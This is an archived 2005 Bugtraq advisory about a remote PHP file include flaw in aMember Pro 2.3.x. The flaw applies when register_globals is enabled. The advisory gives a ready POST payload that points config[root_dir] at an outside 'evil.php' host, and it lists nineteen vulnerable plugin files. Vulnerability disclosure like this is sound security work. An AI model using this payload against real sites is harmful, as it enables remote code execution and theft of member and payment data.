Home page logo
/

bugtraq logo Bugtraq mailing list archives

[NewAngels Advisory] aMember Pro 2.3.X - Remote File Include Vulnerability
From: 4Degrees () 46and2 com
Date: 5 Sep 2005 01:08:54 -0000

[NewAngels Advisory #2] aMember Pro 2.3.X - Remote File Include Vulnerability
=============================================================================


Software: aMember Pro 2.3.4
Type: Remote PHP File Include Vulnerability
Risk: High

Date: Aug. 16 2005
Vendor: CGI Central


Credit:
=======
NewAngels Team with special note of 4Degrees.


Description:
============
"aMember is a flexible membership and subscription management PHP script. It has support for PayPal, BeanStream, 
2Checkout, NoChex, VeriSign PayFlow, Authorize.Net, PaySystems, Probilling, Multicards, E-Gold and Clickbank payment 
systems (complete list can be found here) and allows you to setup paid-membership areas on your site. It can also be 
used without any payment system - you can manage users manually."
[http://www.amember.com/]


PHP Requirements:
=================
register_globals = On


Vulnerability:
==============
Source:
global $config;
[...]
require_once($config['root_dir']."...somestring...");




Exploitation:
=============
This vulnerability exists in several files, the code is not exactly the same in all files.
But the exploit does remain the same.

Example: http://www.somesite.com/aMember/plugins/db/mysql/mysql.inc.php
POST: config[root_dir]=http://www.46and2.com/evil.php?

Vulnerable Files:
/aMember/plugins/db/mysql/mysql.inc.php
/aMember/plugins/payment/efsnet/efsnet.inc.php
/aMember/plugins/payment/theinternetcommerce/theinternetcommerce.inc.php
/aMember/plugins/payment/cdg/cdg.inc.php
/aMember/plugins/payment/compuworld/compuworld.inc.php
/aMember/plugins/payment/directone/directone.inc.php
/aMember/plugins/payment/authorize_aim/authorize_aim.inc.php
/aMember/plugins/payment/beanstream/beanstream.inc.php
/aMember/plugins/payment/echo/config.inc.php
/aMember/plugins/payment/eprocessingnetwork/eprocessingnetwork.inc.php
/aMember/plugins/payment/eway/eway.inc.php
/aMember/plugins/payment/linkpoint/linkpoint.inc.php
/aMember/plugins/payment/logiccommerce/logiccommerce.inc.php
/aMember/plugins/payment/netbilling/netbilling.inc.php
/aMember/plugins/payment/payflow_pro/payflow_pro.inc.php
/aMember/plugins/payment/paymentsgateway/paymentsgateway.inc.php
/aMember/plugins/payment/payos/payos.inc.php
/aMember/plugins/payment/payready/payready.inc.php
/aMember/plugins/payment/plugnplay/plugnplay.inc.php


  By Date           By Thread  

Current thread:
  • [NewAngels Advisory] aMember Pro 2.3.X - Remote File Include Vulnerability 4Degrees (Sep 07)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault